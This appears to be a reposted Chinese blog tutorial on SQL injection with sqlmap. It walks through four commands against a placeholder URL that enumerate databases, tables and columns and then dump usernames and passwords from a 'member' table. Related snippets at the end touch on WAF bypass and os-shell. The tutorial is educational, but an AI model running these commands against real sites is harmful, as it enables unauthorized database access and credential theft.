sqlmap的简单爆破

摘要:
第一步:爆破数据库库名#sqlmap-u"http://"--dbs///--dbs爆破数据库爆破出数据库,如图///爆破成功,查看到五个数据库第二步:爆破出数据库,接着爆破数据库中的表#sqlmap-u"http://"-Dstormgroup--tables///-D是数据库名,--tables是要爆破数据库中的表、///爆破出来两个表第三步:爆破表之后,接着爆破表中的列#sqlmap-u"http://"-Dstormgroup-Tmember--columns///-T是表名,--columns是要爆破的表中的列///爆破列完成第四步:爆破数据#sqlmap-u"http://"-Dstormgroup-Tmember-Cname,password--dump///-C是要爆破的列,--dump是爆破///爆破出数据库用户名和密码这就是简单的sqlmap爆破

第一步:爆破数据库库名

#sqlmap -u "http://<爆破的链接>" --dbs ///--dbs爆破数据库

爆破出数据库,如图

sqlmap的简单爆破第1张

sqlmap的简单爆破第2张 ///爆破成功,查看到五个数据库

第二步:爆破出数据库,接着爆破数据库中的表

#sqlmap -u"http://<爆破的链接>" -D stormgroup --tables ///-D 是数据库名,--tables是要爆破数据库中的表

sqlmap的简单爆破第3张

sqlmap的简单爆破第4张

///爆破出来两个表

第三步:爆破表之后,接着爆破表中的列

#sqlmap -u"http://<爆破的链接>" -D stormgroup -T member --columns ///-T 是表名, --columns是要爆破的表中的列

sqlmap的简单爆破第5张

sqlmap的简单爆破第6张

///爆破列完成

第四步:爆破数据

#sqlmap-u"http://<爆破的链接>" -D stormgroup -T member -C name,password --dump ///-C 是要爆破的列,--dump是爆破

sqlmap的简单爆破第7张

sqlmap的简单爆破第8张

///爆破出数据库用户名和密码

这就是简单的sqlmap爆破

免责声明:文章转载自《sqlmap的简单爆破》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇git操作前端通过js获取微信公众号用户的唯一标识符openId下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

sqlmap介绍与使用案例

作者:虫儿飞ZLEI链接:https://www.jianshu.com/p/3d3656be3c60来源:简书著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 sqlmap介绍与使用案例 1.sqlmap简介 最白话的介绍就是sqlmap是一个工具,一个用来做sql注入攻击的工具 2.windows安装python2 这个sqlmap...

sqlmap基础教程

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。 python环境安装教程:http://jingyan.baidu.com/album/c910274be14d64cd361d2dd8.html?picindex=2 注意:sqlmap只是用来检测和利...

Sqlmap绕WAF学习

转载文章:http://www.vuln.cn/2086  感谢大佬的分享! 每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。 但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前...

【SQL注入】之MSSQL注入

(本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦) 该笔记参考网络中的文章,本文仅为了学习交流,严禁非法使用!!! 一、MSSQL手工注入 测试使用Windows Server 2008 R2 中使用IIS搭建的MSSQL-SQLi-Labs站点的第一关(该站点可在Github中找到) 攻击者:Windows 10系统(宿主机)...

sqlmap os-shell探索

目录 1 条件 2 过程 3 分析3.1 上传/命令shell[php] 4 拓展 4.1 google找sqlmap的上传shell 4.2 自定义shell[翻车] 5 参考 1 条件 网站的绝对路径 mysql进程有网站绝对路径的写权限 mysql用户为root mysql允许写[secure_file_priv] GPC关闭...

sqlmap的安装

来自:http://www.51testing.com/html/89/n-3711589.html  一、下载   首先,需下载SqlMap以及适用于Windows系统的Python。下载地址如下:   1.1、SqlMap下载地址:https://github.com/sqlmapproject/sqlmap/tarball/master 可下载到最新...